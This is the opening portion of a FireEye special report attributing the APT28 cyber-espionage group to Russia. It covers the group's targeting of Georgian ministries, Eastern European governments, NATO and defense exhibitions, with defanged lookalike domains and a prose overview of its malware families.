                               SPECIAL REPORT




APT28:
A WINDOW INTO RUSSIA’S CYBER
ESPIONAGE OPERATIONS?




                 SECURITY
                 REIMAGINED
APT 28: A Window into Russia’s Cyber Espionage Operations?




CONTENTS


EXECUTIVE SUMMARY.................................................................................................................................................................................................................................................................................... 3

APT28 TARGETING REFLECTS RUSSIAN INTERESTS......................................................................................................................................................................... 6

	             APT28 interest in the Caucasus, Particularly Georgia............................................................................................................................................................ 7

		                           APT28 Targeting of the Georgian Ministry of Internal Affairs (MIA)........................................................................................ 8

		                           APT28 Targeting of the Georgian Ministry of Defense........................................................................................................................................ 9

		                           APT28 Targeting a Journalist Covering the Caucasus....................................................................................................................................... 10

		                           APT28’s Other Targets in the Caucasus........................................................................................................................................................................................ 11

	             APT28 Targeting of Eastern European Governments and Militaries.................................................................................................... 12

	             APT28 Targeting of NATO and Other European Security Organizations..................................................................................... 14

		APT28 Targets European Defense Exhibitions................................................................................................................................................................ 16

	             Other APT28 Targets Are Consistent With Nation State Interests......................................................................................................... 17

APT28 MALWARE INDICATES SKILLED RUSSIAN DEVELOPERS......................................................................................................................... 19

	             Modular Implants Indicate a Formal Development Environment............................................................................................................... 24

	             APT28 Malware Indicates Russian Speakers in a Russian Time Zone................................................................................................. 25

		                           Compile Times Align with Working Hours in Moscow and St. Petersburg................................................................ 27

CONCLUSION.................................................................................................................................................................................................................................................................................................................. 28

APPENDIX A: DISTINGUISHING THREAT GROUPS.......................................................................................................................................................................... 29

APPENDIX B: TIMELINE OF APT28 LURES.......................................................................................................................................................................................................... 30

APPENDIX C: SOURFACE/CORESHELL...................................................................................................................................................................................................................... 31

APPENDIX D: CHOPSTICK.................................................................................................................................................................................................................................................................... 35

APPENDIX E: OLDBAIT................................................................................................................................................................................................................................................................................. 43




2 fireeye.com
APT 28: A Window into Russia’s Cyber Espionage Operations?




EXECUTIVE SUMMARY



Our clients often ask us to assess the threat Russia poses in cyberspace. Russia has
long been a whispered frontrunner among capable nations for performing
sophisticated network operations. This perception is due in part to the Russian
government’s alleged involvement in the cyber attacks accompanying its invasion of
Georgia in 2008, as well as the rampant speculation that Moscow was behind a
major U.S. Department of Defense network compromise, also in 2008. These
rumored activities, combined with a dearth of hard evidence, have made Russia into
something of a phantom in cyberspace.

                             In this paper we discuss a threat group whose                                     the country of Georgia, Eastern European
                             malware is already fairly well-known in the                                       governments and militaries, and European
                             cybersecurity community. This group, unlike the                                   security organizations since at least 2007.
                             China-based threat actors we track, does not                                      They compile malware samples with Russian
                             appear to conduct widespread intellectual                                         language settings during working hours
                             property theft for economic gain. Nor have we                                     consistent with the time zone of Russia’s major
                             observed the group steal and profit from                                          cities, including Moscow and St. Petersburg.
                             financial account information.
                                                                                                               While we don’t have pictures of a building,
                             The activity that we profile in this paper                                        personas to reveal, or a government agency to
                             appears to be the work of a skilled team of                                       name, what we do have is evidence of long-
                             developers and operators collecting intelligence                                  standing, focused operations that indicate a
                             on defense and geopolitical issues – intelligence                                 government sponsor – specifically, a
                             that would only be useful to a government. We                                     government based in Moscow.
                             believe that this is an advanced persistent
                             threat (APT) group engaged in espionage                                           We are tracking this group as APT28.
                             against political and military targets including



                             1
                                  Markoff, John. “Before the Gunfire, Cyberattacks”. The New York Times 12 August 2008. Web. http://www.nytimes.com/2008/08/13/technology/13cyber.html
                              2
                                  Knowlton, Brian. “Military Computer Attack Confirmed”. The New York Times. 25 August 2010. Web. http://www.nytimes.com/2010/08/26/
                                  technology/26cyber.html




3 fireeye.com
APT 28: A Window into Russia’s Cyber Espionage Operations?




 KEY FINDINGS




APT28 targets insider information
related to governments, militaries, and
security organizations that would
likely benefit the Russian government.




  GEORGIA                                         EASTERN EUROPE                           SECURITY ORGANIZATIONS

  APT28 likely seeks to collect intelligence      APT28 has demonstrated interest in       APT28 appeared to target individuals
  about Georgia’s security and political          Eastern European governments and         affiliated with European security
  dynamics by targeting officials working         security organizations. These victims    organizations and global multilateral
  for the Ministry of Internal Affairs and        would provide the Russian government     institutions. The Russian government
  the Ministry of Defense.                        with an ability to predict policymaker   has long cited European security
                                                  intentions and gauge its ability to      organizations like NATO and the OSCE
                                                  influence public opinion.                as existential threats, particularly during
                                                                                           periods of increased tension in Europe.




4 fireeye.com
APT 28: A Window into Russia’s Cyber Espionage Operations?



                                                                         Malware compile times suggest
                                                                         that APT28 developers have
                                                                         consistently updated their tools
                                                                         over the last seven years.




 KEY FINDINGS




                                                             Since 2007, APT28 has systematically evolved its malware,
                                                             using flexible and lasting platforms indicative of plans for
                                                             long-term use. The coding practices evident in the group’s
                                                             malware suggest both a high level of skill and an interest in
                                                             complicating reverse engineering efforts.

  •	   Malware compile times suggest that APT28 developers               •	   APT28 tailors implants for specific victim
       have consistently updated their tools over the last                    environments. They steal data by configuring their
       seven years.                                                           implants to send data out of the network using a victim
  •	   APT28 malware, in particular the family of modular                     network’s mail server.
       backdoors that we call CHOPSTICK, indicates                       •	   Several of APT28’s malware samples contain counter-
       a formal code development environment. Such an                         analysis capabilities including runtime checks to
       environment would almost certainly be required to                      identify an analysis environment, obfuscated strings
       track and define the various modules that can be                       unpacked at runtime, and the inclusion of unused
       included in the backdoor at compile time.                              machine instructions to slow analysis.



  Indicators in APT28’s malware suggest that the group consists of
  Russian speakers operating during business hours in Russia’s major cities.

  More than half of the malware samples with Portable                  Over 96% of the malware samples we have attributed to APT28
  Executable (PE) resources that we have attributed to APT28           were compiled between Monday and Friday. More than 89%
  included Russian language settings (as opposed to neutral or         were compiled between 8AM and 6PM in the UTC+4 time zone,
  English settings), suggesting that a significant portion of          which parallels the working hours in Moscow and St.
  APT28 malware was compiled in a Russian language build               Petersburg. These samples had compile dates ranging from
  environment consistently over the course of six years (2007          mid-2007 to September 2014.
  to 2013).




5 fireeye.com
APT 28: A Window into Russia’s Cyber Espionage Operations?



Three themes in APT28’s targeting clearly
reflect areas of specific interest to an
Eastern European government, most likely
the Russian government.




APT28 TARGETING REFLECTS


RUSSIAN
INTERESTS
M
            any of APT28’s targets align generally                            whose accounts APT28 hopes to breach, the                 APT 28: Three Themes
            with interests that are typical of any                            subjects of the lures provide clues as to APT28’s
            government. However, three themes in                              targets and interests. For example, if the group’s
APT28’s targeting clearly reflects areas of specific                          lures repeatedly refer to the Caucasus, then this
interest to an Eastern European government, most                              most likely indicates that APT28 is trying to gain        The Caucasus,
likely the Russian government. These include the                              access to the accounts of individuals whose work          particularly the
                                                                                                                                        country of Georgia
Caucasus (especially the Georgian government),                                pertains to the Caucasus. Similarly, APT28’s practice
Eastern European governments and militaries, and                              of registering domains that mimic those of legitimate
specific security organizations.                                              news, politics, or other websites indicates topics that
                                                                              are relevant to APT28’s targets.
APT28 uses spearphishing emails to target its                                                                                           Eastern European
victims, a common tactic in which the threat group                            We identified three themes in APT28’s lures and           governments and
crafts its emails to mention specific topics (lures)                          registered domains, which together are                    militaries
relevant to recipients. This increases the                                    particularly relevant to the Russian government.
likelihood that recipients will believe that the
email is legitimate and will be interested in                                 In addition to these themes, we have seen APT28
opening the message, opening any attached files,                              target a range of political and military                  The North Atlantic
or clicking on a link in the body of the email. Since                         organizations. We assess that the work of these           Treaty Organization
                                                                                                                                        (NATO) and other
spearphishing lures are tailored to the recipients                            organizations serves nation state governments.
                                                                                                                                        European security
                                                                                                                                        organizations
7
  Bloomberg. “Neiman Marcus Hackers Set Off 60,000 Alerts While Bagging Credit Card Data.” February 2014.
8
  Ibid.
9
  Ibid.


6 fireeye.com
APT 28: A Window into Russia’s Cyber Espionage Operations?



APT28 INTEREST IN
THE CAUCASUS,
PARTICULARLY GEORGIA




                                                             RUSSIA
                   Abkhazia                                                                    Chechnya
                                                                                             Kavkaz Center




                                                                GEORGIA

                                                                                  Tbilisi




                                                                              ARMENIA
                        TURKEY                                                                               AZERBAIJAN

                                                                        Armenian Military
                                                                              Yerevan




                             T
                                     he Caucasus, a region that includes            Since 2011, APT28 has used lures written in
                                     Chechnya and other Russian republics and       Georgian that are probably intended to target
                                     the independent states of Georgia,             Georgian government agencies or citizens.
                             Armenia, and Azerbaijan, continues to experience       APT28 is likely seeking information on Georgia’s
                             political unrest. The Georgian government’s            security and diplomatic postures. Specifically,
                             posture and ties to the West are a frequent            the group has targeted the Georgian Ministry of
                             source of Moscow’s frustration, particularly after     Internal Affairs (MIA) and the Ministry of
                             the 2008 war. Overall, issues in the Caucasus          Defense (MOD). We also observed efforts to
                             likely serve as focal points for Russian               target a journalist working on issues in the
                             intelligence collection efforts.                       Caucasus and a controversial Chechen news site.


7 fireeye.com
APT 28: A Window into Russia’s Cyber Espionage Operations?




                                                                                                                                  Georgian Ministry of Internal Affairs (MIA)




APT28 made at least two specific attempts to target
the Georgian Ministry of Internal Affairs.



                             APT28 Targeting of the Georgian                                                      license numbers. The backdoor attempted to
                             Ministry of Internal Affairs (MIA)                                                   establish a connection to a Georgian MIA mail
                             The MIA harbors sensitive information about the                                      server and communicate via MIA email addresses
                             inner workings of Georgia’s security operations, the                                 ending with “@mia.ge.gov”. Once connected to the
                             country’s engagement in multilateral institutions,                                   mail server, APT28’s backdoor sent an email
                             and the government’s communications backbone. It                                     message using a subject line related to driver’s
                             is responsible for3:                                                                 licenses (in Georgian), and attached a file
                                                                                                                  containing system reconnaissance information.
                             •	       Policing, internal security, and border patrols                             This tactic could allow APT28 to obtain data from
                             •	       Counterintelligence                                                         the MIA’s network through a less-monitored
                             •	       Counterterrorism                                                            route, limiting the MIA network security
                             •	       International relations                                                     department’s abilities to detect the traffic.
                             •	       Defense of Georgia’s strategic facilities
                                      and assets                                                                  In the second example of MIA targeting, an APT28
                             •	       “Operative-Technical” tasks                                                 lure used an information technology-themed decoy
                                                                                                                  document that included references to the Windows
                             APT28 made at least two specific attempts to                                         domain “MIA Users\Ortachala…” (Figure 1).
                             target the MIA. In one case, we identified an                                        This probably referred to the MIA facility in the
                             APT28 lure from mid-2013 that referenced                                             Ortachala district of Tbilisi, Georgia’s capital city.
                             MIA-related topics and employed malware that                                         The decoy document also contains metadata listing
                             attempted to disguise its activity as legitimate                                     “MIA” as the company name and “Beka Nozadze”4
                             MIA email traffic. The lure consisted of a                                           as an author, a possible reference to a system
                             weaponized Excel file that presented a decoy                                         administrator in Tbilisi. The text of the document
                             document containing a list of Georgian driver’s                                      purports to provide domain and user group setup



                             3
                                 Georgian Ministry of Internal Affairs website http://police.ge/en/home
                             4
                                 Queries on the author yielded a LinkedIn page for a person of the same name who serves as a system administrator in Tbilisi.




8 fireeye.com
APT 28: A Window into Russia’s Cyber Espionage Operations?




                             information for internal Windows XP and Windows    training the Georgian military. APT28 used a lure
                             7 systems. APT28 possibly crafted this document    document that installed a SOURFACE downloader
                             to appear legitimate to all MIA system users and   (further discussed in the Malware section) and
                             intended to breach the MIA network specifically    contained a listing of birthdays for members of a
                             using the embedded malware.                        working group between the Georgian MOD and
                                                                                the U.S. defense contractor. The U.S. contractor
                             APT28 Targeting of the Georgian                    was involved in a working group to advise the MOD
                             Ministry of Defense                                and Georgian Armed Forces, assess Georgia’s
                             APT28 also appeared to target Georgia’s MOD        military capabilities, and develop a military training
                             along with a U.S. defense contractor that was      program for the country.




   Figure 1: Georgian MIA-related decoy




9 fireeye.com
APT 28: A Window into Russia’s Cyber Espionage Operations?




   Figure 2: Excerpt of APT28’s letter to a journalist writing on Caucasus-related issues



                 We wish our cooperation will be both profitable and trusted. Our aim in the Caucasian region is
                 to help people who struggle for their independence, liberty and human rights. We all know, that
                 world is often unfair and cruel, but all together we can make it better.
                 Send your articles on this email – in Russian or English, please. There are some difficulties with
                 Caucasian languages, but we’ll solve the problem pretty soon, I hope.




                              Targeting journalists could provide APT28 and its sponsors
                              with a way to monitor public opinion, identify dissidents,
                              spread disinformation, or facilitate further targeting.


                              We believe that APT28’s targeting of the MOD                                      APT28 Targeting a Journalist Covering
                              aligns with Russian threat perceptions. The                                       the Caucasus
                              growing U.S.-Georgian military relationship has                                   Another one of APT28’s lures appeared to target
                              been a source of angst for Russia. Georgia and                                    a specific journalist covering issues in the
                              Russia severed diplomatic relations following the                                 Caucasus region. In late 2013, APT28 used a lure
                              Russia-Georgia War in 2008, and Georgia has                                       that contained a letter addressing a journalist by
                              since sought to align itself more closely with                                    his first name and claiming to originate from a
                              western security organizations. Additionally, in                                  “Chief Coordinator” in Reason Magazine’s
                              June 2014, despite Russia’s vocal objections,                                     “Caucasian Issues Department” - a division that
                              Georgia, along with Ukraine and Moldova, signed                                   does not appear to exist.6 (Reason Magazine is a
                              association accords with the EU.5 This move                                       US-based magazine) The letter welcomed the
                              placed all three countries more firmly in the EU’s                                individual as a contributor and requested topic
                              political, economic, and security spheres of                                      ideas and identification information in order to
                              influence. Georgian military security issues,                                     establish him at the magazine. In the background,
                              particularly with regard to U.S. cooperation and                                  the decoy document installed a SOURFACE
                              NATO, provide a strong incentive for Russian                                      backdoor on the victim’s system.
                              state-sponsored threat actors to steal information
                              that sheds light on these topics.




                              5
                                 	 “The EU’s Association Agreements with Georgia, the Republic of Moldova and Ukraine”. European Union Press Release Database. 23 June 2014.
                                    Web. http://e uropa.eu/rapid/press-release_MEMO-14-430_en.htm
                              6	
                                   We attempted to identify candidate journalists in the country. One of these was a Georgian national of Chechen descent, whose work appears to center on
                                   Chechen and human rights issues. Ultimately, however, we cannot confirm the identity of the target(s).




10 fireeye.com
APT 28: A Window into Russia’s Cyber Espionage Operations?




 Table 1: Examples of APT28 domains imitating organizations in the Caucasus




 APT28 Domain               Real Domain

                            The Kavkaz Center / The Caucasus Center, an international Islamic news agency with coverage of
 kavkazcentr[.]info
                            Islamic issues, particularly Russia and Chechnya (kavkazcenter.com)
 rnil[.]am                  Armenian military (mil.am)




                             The body of the letter suggests that APT28 actors                                APT28’s Other Targets in the Caucasus
                             are able to read at least two languages – Russian                                We have seen APT28 register at least two
                             and English. The grammar of the letter also                                      domains mimicking the domains of legitimate
                             indicates that English is not the author’s first                                 organizations in the Caucasus, as shown in the
                             language, despite it purportedly originating from a                              table below. One APT28 domain imitated a key
                             US-based magazine. This implies that Russian may                                 Chechen-focused news website, while the other
                             be the APT28 author’s preferred language.                                        appeared to target members of the Armenian
                                                                                                              military by hosting a fake login page.
                             Targeting journalists could provide APT28 and its
                             sponsors with a way to monitor public opinion,                                   Of particular note, the Kavkaz Center is a
                             identify dissidents, spread disinformation, or                                   Chechen-run website designed to present an
                             facilitate further targeting. Several other nation                               alternative view to the long-running conflict
                             states are suspected of targeting journalists and                                between Russia and Chechen separatists. In
                             dissidents to monitor their activity, including China                            200410 and 2013,11 Russia’s Foreign Minister
                             and Iran.7,8 Journalists in the Caucasus working on                              voiced his displeasure that a Swedish company
                             Caucasus independence issues would be a prime                                    continues to host the Kavkaz Center website.
                             target for intelligence collection for Moscow.
                             Journalists critical of the Kremlin have long
                             been targets of surveillance and harassment,
                             and a number of governments and human
                             rights organizations have publicly criticized the
                             government for its treatment of journalists and its
                             increasing consolidation of control over the media.9




                             7
                              	 Moran, Ned, Villeneuve, Nart, Haq, Thofique, and Scott, Mike. “Operation Saffron Rose”. FireEye. 13 May 2014. Web. http://www.fireeye.com/blog/technical/
                                malware-research/2014/05/operation-saffron-rose.html
                             8
                              	 The New York Times publicly disclosed their breach by APT12, which they assess was motivated by the China-based actors’ need to know what the
                                newspaper was publishing about a controversial topic related to corruption and the Chinese Communist Party’s leadership.
                             9
                              	 “Russia”. Freedom House Press Release. 2013. Web. http://www.freedomhouse.org/report/freedom-press/2013/russia#.VD8fe9R4rew
                             10
                               “Chechen website promotes terror: Lavrov”. UPI. 16 November 2014. Web. http://www.upi.com/Top_News/2004/11/16/Chechen-website-promotes-
                                terror-Lavrov/UPI-11601100627922/
                             11
                               “Lavrov urges Sweden to ban Chechen website server” The Voice of Russia. 15 May 2013. Web. http://voiceofrussia.com/news/2013_05_15/Lavrov-urges-
                                Sweden-to-ban-Chechen-website-server/




11 fireeye.com
APT 28: A Window into Russia’s Cyber Espionage Operations?



APT28 TARGETING OF
EASTERN EUROPEAN
GOVERNMENTS AND
MILITARIES




                                                                                                            E
                                                                                                                   astern European countries’ political and
                                                                                                                   military postures are traditionally core Russian
Figure 3: Decoy MH17                                                                                               government interests. The Kremlin has long
document probably sent
                                                                                                            regarded the former Soviet Republics and satellite
to the Polish government
                                                                                                            states as in its sphere of economic, political, and
                                                                                                            military interest. Over the past two decades, as many
                                                                                                            of these states joined NATO and the EU, Russia has
                                                                                                            attempted to regain its influence in the region. Many
                                                                                                            of APT28’s targets parallel this continued focus on
                                                                                                            Eastern European governments and militaries.

                                                                                                            APT28 Targets Eastern European
                                                                                                            Government Organizations
                                                                                                            We have evidence that APT28 made at least two
                                                                                                            attempts to compromise Eastern European
                                                                                                            government organizations:

                                                                                                            •	    In a late 2013 incident, a FireEye device
                                                                                                                  deployed at an Eastern European Ministry of
                                                                                                                  Foreign Affairs detected APT28 malware in
                                                                                                                  the client’s network.
                                                                                                            •	    More recently, in August 2014 APT28 used a
                                                                                                                  lure (Figure 3) about hostilities surrounding a
                                                                                                                  Malaysia Airlines flight downed in Ukraine in
                                                                                                                  a probable attempt to compromise the Polish
                                                                                                                  government. A SOURFACE sample employed
                                                                                                                  in the same Malaysia Airlines lure was
                                                                                                                  referenced by a Polish computer security
                                                                                                                  company in a blog post.12 The Polish security
                                                                                                                  company indicated that the sample was “sent
                                                                                                                  to the government,” presumably the Polish
                                                                                                                  government, given the company’s location
                                                                                                                  and visibility.

                              12
                                   “MHT, MS12-27 Oraz *malware*.info” Malware@Prevenity. 11 August 2014. Web. http://malware.prevenity.com/2014/08/malware-info.html




12 fireeye.com
APT 28: A Window into Russia’s Cyber Espionage Operations?


 Table 2: Examples of APT28 domains imitating legitimate Eastern European organization names




 APT28 Domain                                                   Real Domain

 standartnevvs[.]com                                            Bulgarian Standart News website (standartnews.com)

 novinitie[.]com, n0vinite[.]com                                Bulgarian Sofia News Agency website (novinite.com)

 qov[.]hu[.]com                                                 Hungarian government domain (gov.hu)

 q0v[.]pl, mail[.]q0v[.]pl                                      Polish government domain (gov.pl) and mail server domain (mail.gov.pl)

 poczta.mon[.]q0v[.]pl                                          Polish Ministry of Defense mail server domain (poczta.mon.gov.pl)




                             We have evidence that APT28 made at least two attempts
                             to compromise Eastern European government
                             organizations.

                             APT28 has registered domains similar to those of                                   This domain registration suggests that APT28
                             legitimate Eastern European news sites and                                         sought to target individuals either participating in
                             governments, listed in Table 2. These domain                                       the exercises or interested in Baltic military and
                             registrations not only suggest that APT28 is                                       security matters. Such targets would potentially
                             interested in Eastern European political affairs,                                  provide APT28 with sensitive tactical and
                             but also that the group targets Eastern European                                   strategic intelligence concerning regional military
                             governments directly.                                                              capabilities and relationships. These exercises are
                                                                                                                a particular point of interest in Moscow: pro-
                             In addition, APT28 used one domain for command                                     Kremlin press cited Russia’s interpretation of
                             and control sessions (baltichost[.]org) that was                                   these military exercises and NATO’s involvement
                             themed after the Baltic Host exercises. Baltic Host                                as a “sign of aggression,” and Russia’s Foreign
                             is a multinational logistics planning exercise, hosted                             Minister publicly stated that the exercise was “a
                             annually since 2009 by one of the three Baltic                                     demonstration of hostile intention.”15
                             States (Estonia, Latvia, and Lithuania, all three of
                             which are on Russia’s border) on a rotational basis.
                             In June 2014, this event was integrated with a
                             larger U.S. Army training event, and focused on
                             exercises to improve interoperability with regional
                             allies and partners.13, 14


                             13
                               	 “Saber Strike and Baltic Host kick off in Latvia, Lithuania and Estonia’. Estonian Defense Forces. 9 June 2014. Web. 11 June 2014. http://www.mil.ee/en/		
                                 news/8251/saber-strike-and-baltic-host-kick-off-in-latvia,-lithuania-and-estonia
                             14	
                                 “Baltic Host 2014 rendering host nation support for the training audience of Exercise Saber Strike 2014 and repelling faked cyber-attacks”. Republic of
                                 Lithuania Ministry of National Defense. 12 June 2014. Web. http://www.kam.lt/en/news_1098/current_issues/baltic_host_2014_rendering_host_nation_
                                 support_for_the_training_audience_of_exercise_saber_strike_2014_and_repelling_faked_cyber-attacks.html
                             15	
                                 “Tanks, troops, jets: NATO countries launch full-scale war games in Baltic”. Russia Today. 9 June 2014. Web. http://rt.com/news/164772-saber-strike-
                                 exercise-nato/




13 fireeye.com
APT 28: A Window into Russia’s Cyber Espionage Operations?



APT28 TARGETING OF
NATO AND OTHER
EUROPEAN SECURITY
ORGANIZATIONS




                             A
                                      PT28’s lures and domain registrations also                                 elections. Insider information about NATO, the
                                      demonstrate their interest in NATO and                                     OSCE and other security organizations would
                                      other European security organizations.                                     inform Russian political and military policy.
                             NATO remains a chief Russian adversary, or in the
                             words of Russia’s 2010 military doctrine, a “main                                   Several of the domains APT28 registered imitated
                             external military danger” particularly as it moves                                  NATO domain names, including those of NATO
                             “closer to the borders of the Russian Federation.”16                                Special Operations Headquarters and the NATO
                             As the traditional western counterweight to the                                     Future Forces Exhibition. We also observed a user
                             Soviet Union, Russia regards NATO, particularly                                     that we suspect works for NATO HQ submit an
                             NATO’s eastward expansion, as a threat to Russia’s                                  APT28 sample to VirusTotal, probably as a result
                             strategic stability. APT28 also registered a domain                                 of receiving a suspicious email.
                             name imitating the Organization for Security
                             and Cooperation in Europe (OSCE), an
                             intergovernmental organization that has cited
                             widespread fraud in numerous Russian state




                              Table 3: Examples of APT28 domains imitating legitimate NATO and security websites



                              APT28 Domain                                   Real Domain

                              nato.nshq[.]in                                 NATO Special Operations Headquarters (nshq.nato.int)
                              natoexhibitionff14[.]com                       NATO Future Forces 2014 Exhibition & Conference (natoexhibition.org)
                              login-osce[.]org                               Organization for Security and Cooperation in Europe (osce.org)



                             16
                                  The Military Doctrine of the Russian Federation, approved by Presidential edict on 5 February 2010.




14 fireeye.com
APT 28: A Window into Russia’s Cyber Espionage Operations?




                                                             APT28 also demonstrated an interest in defense
                                                             attaches working in European countries. We identified
                                                             an APT28 lure containing a decoy document with a list
                                                             of British officers and U.S. and Canadian military
                                                             attachés in London.




   Figure 4: Decoy
   document used
   against military
   attaches in 2012




                                                             Finally, APT28 used a lure that contained an apparent
                                                             non-public listing of contact information for defense
                                                             attachés in the “Ankara Military Attaché Corps (AMAC),”
                                                             which appears to be a professional organization of
                                                             defense attachés in Turkey.




   Figure 5: Ankara
   Military Attache Corps
   decoy document




15 fireeye.com
APT 28: A Window into Russia’s Cyber Espionage Operations?




                             APT28 Targets European                                SMi Group, a company that plans events for the
                             Defense Exhibitions                                   “Defence, Security, Energy, Utilities, Finance and
                             In addition to targeting European security            Pharmaceutical sectors.” Among other events, the
                             organizations and governments, it appears that        SMi Group is currently planning a military satellite
                             APT28 is targeting attendees of European              communications event for November 2014.
                             defense exhibitions. Some of the APT28-
                             registered domains imitated those of defense          Targeting organizations and professionals
                             events held in Europe, such as the Farnborough        involved in these defense events would likely
                             Airshow 2014, EuroNaval 2014, EUROSATORY              provide APT28 with an opportunity to procure
                             2014, and the Counter Terror Expo. In September       intelligence pertaining to new defense
                             2014, APT28 registered a domain (smigroup-            technologies, as well as the victim organizations’
                             online.co[.]uk) that appeared to mimic that for the   operations, communications, and future plans.




                                                                                   Targeting organizations and
                                                                                   professionals involved in
                                                                                   these defense events would
                                                                                   likely provide APT28 with an
                                                                                   opportunity to procure
                                                                                   intelligence pertaining to
                                                                                   new defense technologies.




16 fireeye.com
APT 28: A Window into Russia’s Cyber Espionage Operations?



OTHER APT28 TARGETS
ARE CONSISTENT
WITH NATION STATE
INTERESTS




A
         PT28 has targeted a variety of organizations
                                                             INTERNATIONAL ORGANIZATION
         that fall outside of the three themes we
         highlighted above. However, we are not
profiling all of APT28’s targets with the same               European Commission
detail because they are not particularly indicative
of a specific sponsor’s interests. They do indicate          UN Office for the Coordination of Humanitarian Affairs
parallel areas of interest to many governments
and do not run counter to Russian state interests.
                                                             APEC
Other probable APT28 targets that we have
identified:                                                  NATO

•	   Norwegian Army (Forsvaret)
                                                             OSCE
•	   Government of Mexico
•	   Chilean Military
•	   Pakistani Navy                                          World Bank
•	   U.S. Defense Contractors
•	   European Embassy in Iraq
•	   Special Operations Forces Exhibition (SOFEX)
                                                             OTHER
     in Jordan
•	   Defense Attaches in East Asia
•	   Asia-Pacific Economic Cooperation (APEC)                Hizb ut-Tahir
•	   Al-Wayi News Site
                                                             Chechnya Global
 KEY
 APT28 Registered Domains
                                                             Diplomatic Forum
 Lure Document
                                                             Military Trade Shows
 Phishing Email




17 fireeye.com
APT 28: A Window into Russia’s Cyber Espionage Operations?




                                                                                         HUNGARIAN GO



                                                                                                                  IVERSITY
                                                                  NOR




                                                                                                                                               T
                                                                                                                                            MEN
                                                      UK




                                                                                                                                                            ER
                                                                     WEG
                                                         DE




                                                                                                                                         ERN



                                                                                                                                                         NT
                                                                                                                        UN
                                                           FEN




                                                                                                                                                                      FA
                                                                        IAN M




                                                                                                                                                      CE
                                                                                                                                     GOV




                                                                                                                                                                      M
                                                                                                               CROATIAN
                                                              S




                                                                                                                                                   AZ



                                                                                                                                                                   KI
                                                           EA




                                                                                                                                                                 BE
                                                                                                      VERNME
                                                                             ILITA




                                                                                                                                                 VK
                                                                                                                                ISH




                                                                                                                                                                                      Y
                                                             TTA




                                                                                                                                                             UZ




                                                                                                                                                                                    AR
                                                                                                                                               KA
                                                                                                                               POL




                                                                                                                                                                                  IT
                                                                           RY
                                                                CH




                                                                                                                                                                                IL
                                                                                                                                                                               M
                                                                  ES




                                                                                                                                                                            N
                                                                                                                                                                                                           NT

                                                                                                NT




                                                                                                                                                                          IA
                                                                                                                                                                                                        ME




                                                                                                                                                                    EN
                                                                                                                                                                                                  N




                                                                                                                                                                   M
                                                                                                                                                                                               ER




                                                                                                                                                                 AR
                                                                                                                                                                                              V
                                                                                                                                                                                         GO
                                                                                                                                                                                    N
                                                                                                                                                                                GIA
                                                                                                                                                                                                                     LE
                                                                                                                                                                          OR                                 TIC
                                                                                                                                                                      GE                             S     AR
                                                                                                                                                                                                  EW
              CAN                                                                                                                                                                            TN
                  ADI
                         AN                                                                                                                                                       P     RIO
                              DEF                                                                                                                                              CY
                                 ENS
                                      E AT
                                            TAC
                                                HES
                                                                                                                                                                                                                     JAPAN
                                                                                                                                                                                                  TACHES IN
                                                                                                                                                                          DEFENSE AT
          US DEFENSE ATTACHES AND US DEFENSE CONTRACTORS
                                                                                                                                                             DEFENSE ATTA
                                                                                                                                                                                        CHES IN SOUTH
                                                                                                                                                                                                                     KOREA
                                                                                                                                                                           DEFE
                                    NMENT                                                                                                                                            NSE A
                    AN   GOVER                                                                                                                                                            TTAC
           MEXIC                                                                                                                                                                                           HES IN
                                                                                                                                                                                                                     CHIN
                                                                                                                                                                                                                          A


                                                                                                                                                                   EU           EM
                                                                                                                                                                      RO             IRA
                                                                                                                                                                           PE           TI
                                                                                                                                                                                               NE
                                                                                                                                                                               AN                  WS
                                                                                                                                                                                     EM                    WE
                                                                                                                                                                                         BA                     BS
                                                                                                                                                                          IR                  SS                  ITE
                                                                                                                                                                            AN                    Y
                                                                                                                                            DE




                                                                                                                                                                                IA                    IN
                                                                                                                                                                                    N                      IR
                                                                                                                                              FE




                                                                                                                                                                                                             AQ
                                                                                                                                                         AF




                                                                                                                                                                                        AC
                                                                                                                                                                   PA
                                                 Y




                                                                                                                                     BUL
                                                                                     O (MFA)
                                               AR




                                                                                                                                                   NS




                                                                                                                                                                                          AD
                                                                                                                                                          GH


                                                                                                                                                                      K AS
                                             IT




                                                                                                                                                                                              EM
                                                                                                                                                   EA
                                                                                                                                        GAR




                                                                                                                                                             AN
                                            IL




                                                                                                                                                                          TA




                                                                                                                                                                                                   IC
                                           M




                                                                                                                                                     TTA


                                                                                                                                                                 IN



                                                                                                                                                                             N




                                                                                                                                                                                                      S
                                       AN




                                                                                                                                                                                IM
                                                                                                                                          IAN
                                                                               ICAN DIRC




                                                                                                                                                                  EW
                                                                                                                                                        CH
                                     LE




                                                                                                                                                                                  IL
                                                                                                                                                                                        IT
                                                                                                                                                                    S
                                       I




                                                                                                                                            NEW
                                    CH




                                                                                                                                                         ES




                                                                                                                                                                                          AR
                                                                                                                                                                      W




                                                                                                                                                                                            Y
                                                                                                                                                                        EB
                                                                                                                                                           IN
                                                                                                                        UGANDA




                                                                                                                                              SW




                                                                                                                                                                          SI
                                                                                                                                                             TU



                                                                                                                                                                           TE
                                                                             SOUTH AFR




                                                                                                                                                                 RK
                                                                                                                                                   EBS



                                                                                                                                                                 EY
                                                                                                                                                   ITES
                                                                                                                             N NGO




 KEY
 APT28 Registered Domains

 Lure Document
 Phishing Email


18 fireeye.com
APT 28: A Window into Russia’s Cyber Espionage Operations?



Our analysis of some of the group’s more
commonly used tools indicates that APT28
has been systematically updating their
malware since 2007.




APT28 MALWARE INDICATES


SKILLED RUSSIAN
DEVELOPERS
                             A
                                     PT28’s tools are suggestive of the group’s      •	   SOURFACE: This downloader is typically
                                     skills, ambitions, and identity. Our analysis        called Sofacy within the cyber security
                                     of some of the group’s more commonly                 community. However because we have
                             used tools indicates that APT28 has been                     observed the name “Sofacy” used to refer to
                             systematically updating their tools since 2007.              APT28 malware generally (to include the
                             APT28 is most likely supported by a group of                 SOURFACE dropper, EVILTOSS,
                             developers creating tools intended for long-term             CHOPSTICK, and the credential harvester
                             use and versatility, who make an effort to                   OLDBAIT), we are using the name
                             obfuscate their activity. This suggests that APT28           SOURFACE to precisely refer to a specific
                             receives direct ongoing financial and other                  downloader. This downloader obtains a
                             resources from a well-established organization,              second-stage backdoor from a C2 server.
                             most likely a nation state government. APT28’s               CORESHELL is an updated version of
                             malware settings suggest that the developers                 SOURFACE.
                             have done the majority of their work in a Russian       •	   EVILTOSS: This backdoor has been delivered
                             language build environment during Russian                    through the SOURFACE downloader to gain
                             business hours, which suggests that the Russian              system access for reconnaissance,
                             government is APT28’s sponsor.                               monitoring, credential theft, and shellcode
                                                                                          execution.
